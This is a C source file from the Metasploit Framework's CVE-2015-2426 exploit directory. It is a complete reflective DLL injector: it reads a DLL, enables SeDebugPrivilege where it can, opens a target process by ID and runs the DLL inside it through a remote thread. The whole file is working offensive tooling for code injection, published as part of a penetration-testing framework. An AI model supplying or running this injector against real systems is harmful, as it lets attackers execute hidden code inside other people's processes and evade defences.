GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-2426/inject/src/Inject.c
//===============================================================================================//
// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "LoadLibraryR.h"
#pragma comment(lib,"Advapi32.lib")
#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
// Simple app to inject a reflective DLL into a process via its process ID.
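// Usage: inject.exe [pid] [dll_file]
//
// With no arguments the DLL is loaded into the current process (self-test of the loader);
// otherwise argv[1] is the decimal process ID of the target. argv[2] overrides the default
// architecture-specific DLL filename selected at build time below.
//
// Returns 0 once the DLL has been injected and the remote thread has finished, 1 if any step
// fails; the failing step and the Win32 error code are printed via BREAK_WITH_ERROR.
int main( int argc, char * argv[] )
{
	int nResult = 1;
	HANDLE hFile = INVALID_HANDLE_VALUE;   // CreateFile reports failure as INVALID_HANDLE_VALUE, not NULL
	HANDLE hModule = NULL;
	HANDLE hProcess = NULL;
	HANDLE hToken = NULL;
	LPVOID lpBuffer = NULL;
	DWORD dwLength = 0;
	DWORD dwBytesRead = 0;
	DWORD dwProcessId = 0;
	TOKEN_PRIVILEGES priv = {0};

	// Default DLL name depends on the build target; only one of these is compiled in.
#ifdef _WIN64
	const char * cpDllFile = "reflective_dll.x64.dll";
#else
#ifdef WIN_X86
	const char * cpDllFile = "reflective_dll.dll";
#else // WIN_ARM
	const char * cpDllFile = "reflective_dll.arm.dll";
#endif
#endif

	do
	{
		// Usage: inject.exe [pid] [dll_file]

		if( argc == 1 )
		{
			dwProcessId = GetCurrentProcessId();
		}
		else
		{
			// strtoul instead of atoi so that a non-numeric PID is reported rather than
			// silently becoming 0 (which would only fail later at OpenProcess).
			char * cpEnd = NULL;
			unsigned long ulPid = strtoul( argv[1], &cpEnd, 10 );
			if( cpEnd == argv[1] || *cpEnd != '\0' )
			{
				printf( "[-] Invalid process ID '%s'.", argv[1] );
				break;
			}
			dwProcessId = (DWORD)ulPid;
		}

		if( argc >= 3 )
			cpDllFile = argv[2];

		hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
		if( hFile == INVALID_HANDLE_VALUE )
			BREAK_WITH_ERROR( "Failed to open the DLL file" );

		// Only the low 32 bits of the size are requested; a DLL this tool loads is far smaller.
		dwLength = GetFileSize( hFile, NULL );
		if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
			BREAK_WITH_ERROR( "Failed to get the DLL file size" );

		lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength );
		if( !lpBuffer )
			BREAK_WITH_ERROR( "Failed to alloc a buffer!" );

		// A short read would hand a truncated image to the loader, so require the full length.
		if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE || dwBytesRead != dwLength )
			BREAK_WITH_ERROR( "Failed to read the DLL file" );

		// The file contents are now in memory; release the handle early rather than leaking it.
		CloseHandle( hFile );
		hFile = INVALID_HANDLE_VALUE;

		// Best effort: enable SeDebugPrivilege on our own token so OpenProcess can succeed on
		// processes we would otherwise lack access to. Failure here is not fatal; OpenProcess
		// below will report the access error if the privilege was needed and not granted.
		if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
		{
			priv.PrivilegeCount = 1;
			priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

			if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
				AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );

			CloseHandle( hToken );
			hToken = NULL;
		}

		hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
		if( !hProcess )
			BREAK_WITH_ERROR( "Failed to open the target process" );

		// LoadRemoteLibraryR (LoadLibraryR.h) returns the handle of the thread it created in the
		// target, or NULL on failure.
		hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
		if( !hModule )
			BREAK_WITH_ERROR( "Failed to inject the DLL" );

		// %lu matches DWORD (unsigned long on Windows); %d with a DWORD is a format mismatch.
		printf( "[+] Injected the '%s' DLL into process %lu.", cpDllFile, (unsigned long)dwProcessId );

		nResult = 0;

		// INFINITE is the named form of the -1 the original passed.
		WaitForSingleObject( hModule, INFINITE );

	} while( 0 );

	if( lpBuffer )
		HeapFree( GetProcessHeap(), 0, lpBuffer );

	if( hProcess )
		CloseHandle( hProcess );

	// Reached only when a step failed between CreateFileA and the explicit close above.
	if( hFile != INVALID_HANDLE_VALUE )
		CloseHandle( hFile );

	return nResult;
}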